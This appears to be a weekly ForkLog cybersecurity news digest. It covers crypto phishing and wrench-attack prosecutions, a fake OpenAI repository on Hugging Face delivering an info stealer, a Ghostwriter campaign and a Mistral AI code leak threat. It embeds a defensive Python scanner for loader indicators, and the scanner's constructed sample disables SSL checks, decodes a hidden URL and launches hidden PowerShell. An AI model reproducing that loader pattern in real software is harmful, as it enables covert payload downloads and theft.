We’ve gathered the most important cybersecurity news from the past week.

  • ZachXBT identified the mastermind behind $19 million phishing attacks.
  • Three suspects were charged in a series of "wrench attacks" in California.
  • A fake OpenAI repository was spreading an info stealer.
  • "AI junk" has flooded platforms for hackers and cybercriminals.

ZachXBT Identifies Mastermind Behind $19 Million Phishing Attacks

On-chain researcher ZachXBT revealed details of an investigation into cryptocurrency theft via phishing, totaling over $19 million.

1/ Meet Dritan Kapllani Jr, a US-based threat actor tied to $19M from social engineering thefts targeting crypto holders.

Dritan flexes luxury cars, watches, private jets, & clubs all over social media.

Recently he was recorded on a call showing off a wallet with stolen funds. pic.twitter.com/iDKyUjUm4M

— ZachXBT (@zachxbt) May 12, 2026

The main suspect is American hacker Dritan Kapllani Jr. His de-anonymization began with his own carelessness.

On April 23, 2026, during a Discord video call, Kapllani argued with a user about capital sizes (band 4 band). As proof, he showed his Exodus crypto wallet screen with a balance of $3.68 million.

ZachXBT analyzed the transaction chain of the Ethereum address. It was found that the funds were linked to the theft of 185 BTC that occurred on March 14, 2026. The investigation revealed that on March 15, Kapllani received his share—$5.3 million. By the time of the video call in April, the hacker had already spent or laundered about $1.6 million.

During the investigation, the detective also uncovered Kapllani's connection to earlier incidents. This was aided by cybercriminal John Dagita, previously arrested for stealing over $40 million from the US government. As revenge for past conflicts, he published one of Kapllani's old addresses on Telegram.

ZachXBT confirmed his ownership: the withdrawal algorithm matched exactly what was used in the theft of 185 BTC. It was also discovered that in the fall of 2025, over $5.85 million passed through this wallet, stolen in five phishing attacks.

The expert assisted one of the affected parties in the investigation but intentionally withheld his findings until official actions were taken by authorities.

On May 11, 2026, court documents related to the theft of 185 BTC were unsealed.

Charges have already been filed against:

  • Trenton Johnson—for direct involvement in the theft, facing up to 40 years in prison;
  • crypto influencer known as yelotree—for aiding in laundering funds through a car rental business in Miami (up to 30 years in prison).

Kapllani leads a public and lavish lifestyle, showcasing private jets and luxury cars on social media. He had managed to evade arrest for a long time—detectives attribute this "invulnerability" to the common practice of delaying prosecution for minors. Since Kapllani recently turned 18, ZachXBT suggests that charges will be filed against him soon.

Three Suspects Charged in Series of "Wrench Attacks" in California

The US Attorney's Office charged Elijah Armstrong, Nino Chindawan, and Jayden Raker with robbery, kidnapping, and conspiracy related to a series of cryptocurrency thefts.

According to court documents, the suspects moved from Tennessee to California. To gain entry into victims' homes, they posed as couriers.

In November 2025, in San Francisco, a "courier" with a box attacked a client at the entrance to an apartment. The victim was bound with tape, beaten with a gun's handle, and threatened to transfer $10 million in Bitcoin and $3 million in Ethereum.

In another "wrench attack" incident, the victim lost $6.5 million in cryptocurrency.

Armstrong and Raker were arrested in Los Angeles on December 31, 2025, while Chindawan was apprehended in Sunnyvale on December 22, 2025. They face:

  • up to 20 years in prison for robbery and attempted kidnapping;
  • life imprisonment for conspiracy to commit kidnapping;
  • fines of $250,000 for each charge.

According to CertiK, there were 72 recorded "wrench attacks" worldwide in 2025, a 75% increase from the previous year. The total losses from such crimes reached a record $41 million.

Fake OpenAI Repository Spread Info Stealer

A malicious repository on Hugging Face mimicked OpenAI's Privacy Filter project to deliver an info stealer. This was reported by researchers from HiddenLayer.

The Hugging Face platform allows developers and researchers to share AI models, datasets, and machine learning tools.

Experts noted that scammers used a similar name in the Open-OSS/privacy-filter repository, which contained a loader.py file that executes malware to steal data on Windows OS.

The Python script included fake AI-related code to appear harmless. In the background, however, it disabled SSL certificate verification, decoded a URL pointing to an external resource, and then extracted and executed a PowerShell command.

The command, run in a hidden window, downloaded a start.bat batch file. That script escalated privileges, fetched the final payload, and added it to Microsoft Defender's exclusions. The payload was an info stealer written in Rust, also capable of taking screenshots. It stole:

  • cookies, saved passwords, encryption keys, browsing history from Chromium and Gecko-based browsers;
  • Discord tokens, local databases, and master keys;
  • crypto wallets and their browser versions;
  • credentials and configuration files for SSH, FTP, and VPN, including FileZilla;
  • system information.

Researchers noted that the overwhelming majority of the 667 accounts that liked the malicious repository appeared to be automatically generated. Additionally, the download count of 244,000 may have been artificially inflated.
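The loader behaviours described above (TLS verification switched off, a base64-encoded download URL, PowerShell launched in a hidden window) are easy to flag statically before a downloaded repository is ever executed. The following is an added example, not code from HiddenLayer or from the malicious repository: a small AST-based scanner that reports those indicators in a Python file. The sample source it scans is constructed for illustration and points at a reserved .invalid domain.

```python
import ast
import base64
import re

# Constructed sample that reproduces the behaviours attributed to loader.py;
# it is NOT the real file, and the URL decodes to a reserved .invalid domain.
SAMPLE_LOADER = '''
import ssl, base64, subprocess
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGF5bG9hZA==").decode()
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-c", url])
'''

B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _string_args(call: ast.Call) -> list[str]:
    """Lower-cased string literals passed to a call, directly or inside a list literal."""
    out = []
    for a in call.args:
        elts = a.elts if isinstance(a, ast.List) else [a]
        out += [e.value.lower() for e in elts
                if isinstance(e, ast.Constant) and isinstance(e.value, str)]
    return out


def scan_source(src: str) -> set[str]:
    """Return the names of loader indicators found in one Python source file."""
    findings = set()
    for node in ast.walk(ast.parse(src)):
        # 1. TLS verification turned off: default HTTPS context replaced, or verify=False.
        if isinstance(node, ast.Assign) and any(
                isinstance(t, ast.Attribute) and t.attr == "_create_default_https_context"
                for t in node.targets):
            findings.add("ssl_verification_disabled")
        if isinstance(node, ast.Call):
            if any(k.arg == "verify" and isinstance(k.value, ast.Constant)
                   and k.value.value is False for k in node.keywords):
                findings.add("ssl_verification_disabled")
            # 2. PowerShell launched from Python, optionally with a hidden window.
            args = _string_args(node)
            if any("powershell" in a for a in args):
                findings.add("powershell_invocation")
                if "hidden" in args:
                    findings.add("hidden_window")
        # 3. A base64 literal that decodes to a URL (the loader's concealed download location).
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and B64_RE.match(node.value):
            try:
                decoded = base64.b64decode(node.value, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            if decoded.startswith(("http://", "https://")):
                findings.add("base64_encoded_url")
    return findings
```

Any one finding on its own can be benign (test suites disable verification, tooling shells out to PowerShell); the combination seen in this loader is what should block the file from running.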

“AI Junk” Floods Platforms for Hackers and Cybercriminals

Complaints about "AI junk" increasingly appear on the dark web, infiltrating discussions, guides, and technical posts. This was reported by Wired, citing research from Cambridge University and the University of Strathclyde.

Experts analyzed around 98,000 threads on hacker forums related to AI from the launch of ChatGPT in 2022 until the end of 2025. During this period, attitudes toward generative models in the cybercriminal environment changed significantly.

According to the study, while hackers previously discussed how neural networks could help write malicious code or find vulnerabilities, they now more frequently complain about the influx of "AI slop": useless posts and primitive guides on basic topics.

Moreover, some forum participants are unhappy that LLM responses in Google search results reduce traffic to their sites, negatively impacting the marketing of hacker platforms.

However, researchers did not observe a significant impact of AI on the activities of inexperienced scammers. It has not yet lowered the entry barrier for newcomers or led to drastic changes in the cybersecurity industry.

Belarus-Linked Hacker Group Attacks Ukrainian Government Agencies

In March 2026, a new campaign by the Ghostwriter hacker group (also known as UNC1151 and FrostyNeighbor) targeting Ukrainian government and defense structures was recorded. This was reported by researchers from ESET.

The Ghostwriter group, specializing in cyber espionage in Eastern Europe, is linked to Belarus.

Experts noted that the attackers sent phishing PDF files mimicking documents from the company "Ukrtelecom." Malicious links in the document led to the download of PicassoLoader software, which then deployed the popular Cobalt Strike attack tool.

The hackers used IP address verification—the infected archive was only downloaded if the victim was located in Ukraine.

Researchers noted the group’s high "operational maturity." PicassoLoader can send a "fingerprint" of the system to the hackers' servers every 10 minutes. Based on this data, Ghostwriter operators decide whether to continue the attack on a specific target.

Unlike campaigns in Poland or Lithuania, where the group targets a wide range of sectors from logistics to healthcare, its activities in Ukraine are focused exclusively on the military and government sectors.

TeamPCP Hackers Threaten to Release Mistral AI Repositories

The TeamPCP hacker group threatened to leak the source code of Mistral AI projects if a buyer for the stolen data is not found. This was reported by BleepingComputer.

Mistral AI is a French artificial intelligence company founded by former Google DeepMind and Meta researchers. It specializes in developing LLMs with open weights and proprietary software.

In their post on a hacker forum, the attackers demanded $25,000 for a package containing nearly 450 repositories.

In an official statement to BleepingComputer, Mistral AI confirmed the compromise of its code management system. The breach resulted from a large-scale software supply chain attack called Mini Shai-Hulud.

Mistral AI claims that the affected data is not part of the core source code.

According to published information, the attack unfolded in several stages. Initially, the attackers gained access to official TanStack and Mistral AI packages using stolen CI/CD credentials. Subsequently, the malicious campaign spread to hundreds of projects in npm and PyPI registries, including developments from UiPath, Guardrails AI, and OpenSearch.

Mistral AI acknowledged that the attackers briefly injected malicious code into some of the company’s SDK packages.

The TeamPCP group claims to have downloaded nearly 5 GB of internal data that Mistral uses for training, fine-tuning, benchmarking, and experimentation.

The hackers stated they would release the information publicly if a buyer is not found within a week.

Also on ForkLog:

  • Criminals withdrew $10 million from THORChain.
  • The alliance of Tether, TRON, and TRM Labs froze crypto assets worth $450 million.
  • The Ethereum Foundation launched a service to protect against blind signing of transactions.
  • CertiK reported on the "industrialization" of crypto thefts by North Korea.
  • The Roaring Kitty account was hacked for a token dump of RKC.
  • Google noted an increase in AI popularity among cybercriminals.
  • LayerZero acknowledged errors after the Kelp hack of $292 million.

What to Read This Weekend?

In a new article, ForkLog explores how the main software contractor for the US Department of Defense and intelligence agencies, Palantir Technologies, "ensures the obvious superiority of the West."